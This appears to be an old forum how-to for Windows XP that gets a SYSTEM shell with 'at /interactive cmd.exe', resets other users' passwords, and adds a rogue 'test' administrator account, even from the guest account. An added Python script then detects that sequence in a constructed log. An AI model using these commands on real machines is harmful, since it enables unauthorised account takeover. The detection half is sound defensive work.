Using simple command line tools on a machine running Windows XP we
will obtain system-level privileges and run the entire explorer
process (the Desktop), so that every process started from it also has
system privileges. The SYSTEM account sits above Administrator and has
full control of the operating system and its kernel. On many machines
this can be exploited even from the guest account.
Follow these steps:
1. Open a command prompt (Start -> Run -> cmd).
2. Enter the following command, then press ENTER:
   at 15:25 /interactive "cmd.exe"
Let's break down the preceding command. "at" invokes the at command,
which submits a job to the Task Scheduler service; everything after it
is the command's arguments. The important thing here is to change the
time (24-hour format) to one minute after the time currently shown on
your computer's clock. For example, if your computer's clock says it's
4:30pm, convert this to 24-hour format (16:30) and use 16:31 as the
time in the command.
When the system clock reaches the time you set, a new command prompt
will appear. You'll notice that its title bar reads svchost.exe (short
for Service Host) instead of cmd.exe. Now that we have our system
command prompt, you may close the old one. The difference is that this
one runs with system privileges, because it was started by the Task
Scheduler service, which runs under the Local System account.
3. Enter the following command, then press ENTER:
   compmgmt.msc
   This will open the Computer Management console.
4. Go to Local Users and Groups -> Users. Right-click on any user and
   select "Set Password".
It's done now...
If it says "Access denied", do this:
Start -> Run -> cmd
net use \\(your ip add)\IPC$ /u:Administrator
or:
Start -> Run -> cmd
then use the following commands:
1) net user test /add (this command creates a user named "test")
2) net localgroup administrators test /add (this command gives the "test" user administrator rights)
Then use the net user command to reset your admin password.
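As an added example that is not part of the original post, here is a defender-side triage script in Python that looks for the sequence the post describes in a constructed, simplified security-log format: an interactive scheduled task that launches a command shell, followed by a local account being created and added to Administrators by the Local System account (which is the subject those later events carry, because the shell ran under Local System). The pipe-delimited line format, the sample log lines and the interactive=yes field are assumptions for the example; the event IDs 4698, 4720, 4732 and 4688 are the Vista-and-later IDs, since Windows XP used a different three-digit numbering. XP also pre-dates Session 0 isolation, which is what later stopped interactive scheduled jobs from reaching the user's desktop, so the technique itself is XP/2003-era.

```python
# Added example (not code from the original post): a defender-side triage
# sketch for the activity the post describes. Input is a constructed,
# pipe-delimited line format modelled on a few Windows Security event
# fields: timestamp|event_id|subject account|key=value fields. The event IDs
# are the Vista-and-later ones; XP's three-digit IDs differ.
from dataclasses import dataclass
from typing import Dict, List, Optional

SCHED_TASK_CREATED = 4698        # "A scheduled task was created"
USER_CREATED = 4720              # "A user account was created"
LOCAL_GROUP_MEMBER_ADDED = 4732  # "A member was added to a security-enabled local group"
INTERACTIVE_SHELLS = {"cmd.exe", "command.com", "powershell.exe"}


@dataclass
class Event:
    ts: str                 # ISO-8601 timestamp
    event_id: int
    subject: str            # account that performed the action
    detail: Dict[str, str]  # key=value fields from the message body


def parse_event(line: str) -> Optional[Event]:
    """Parse 'ts|id|subject|k=v k=v ...'; return None for malformed lines."""
    parts = line.strip().split("|", 3)
    if len(parts) != 4 or not parts[1].isdigit():
        return None
    ts, eid, subject, body = parts
    detail = {}
    for token in body.split():
        if "=" in token:
            key, value = token.split("=", 1)
            detail[key] = value
    return Event(ts, int(eid), subject, detail)


def is_interactive_shell_task(e: Event) -> bool:
    """True for a task-created event whose command is an interactive shell
    (the 'at <time> /interactive cmd.exe' pattern)."""
    if e.event_id != SCHED_TASK_CREATED:
        return False
    # Compare only the executable name, so a full path still matches.
    exe = e.detail.get("command", "").lower().rsplit("\\", 1)[-1]
    return exe in INTERACTIVE_SHELLS and e.detail.get("interactive") == "yes"


def find_escalation_chains(lines: List[str]) -> List[str]:
    """Return one alert per chain: interactive shell task, then a local user
    created and added to Administrators afterwards. The later steps are
    expected to run as Local System, so the subject of the account events
    is reported rather than required to match the task's subject."""
    events = [e for e in map(parse_event, lines) if e is not None]
    alerts = []
    for i, task in enumerate(events):
        if not is_interactive_shell_task(task):
            continue
        later = events[i + 1:]
        created = {x.detail.get("user") for x in later if x.event_id == USER_CREATED}
        for x in later:
            if (x.event_id == LOCAL_GROUP_MEMBER_ADDED
                    and x.detail.get("group", "").lower() == "administrators"
                    and x.detail.get("member") in created):
                alerts.append(
                    f"{task.ts}: {task.subject} scheduled interactive "
                    f"{task.detail.get('command')} (task {task.detail.get('task')}); "
                    f"{x.subject} then created '{x.detail['member']}' and added it "
                    f"to Administrators at {x.ts}"
                )
    return alerts


# Constructed sample log: the chain from the post plus a benign scheduled
# job, a process-creation event (4688) and a malformed line.
SAMPLE_LOG = [
    "2009-03-14T09:00:00|4698|HOST\\backupadmin|task=NightlyBackup command=C:\\tools\\backup.bat interactive=no",
    "2009-03-14T16:30:02|4698|HOST\\guest|task=At1 command=cmd.exe interactive=yes",
    "2009-03-14T16:31:00|4688|NT_AUTHORITY\\SYSTEM|process=cmd.exe parent=svchost.exe",
    "2009-03-14T16:33:10|4720|NT_AUTHORITY\\SYSTEM|user=test",
    "2009-03-14T16:33:15|4732|NT_AUTHORITY\\SYSTEM|group=Administrators member=test",
    "garbage line that should be skipped",
]

if __name__ == "__main__":
    for alert in find_escalation_chains(SAMPLE_LOG):
        print(alert)
```

Run as-is it prints one alert for the guest-scheduled cmd.exe job followed by the SYSTEM-created "test" account; the nightly backup job is ignored because its command is not a shell. The same shape of rule works against real exported logs once parse_event is replaced with a parser for the actual export format.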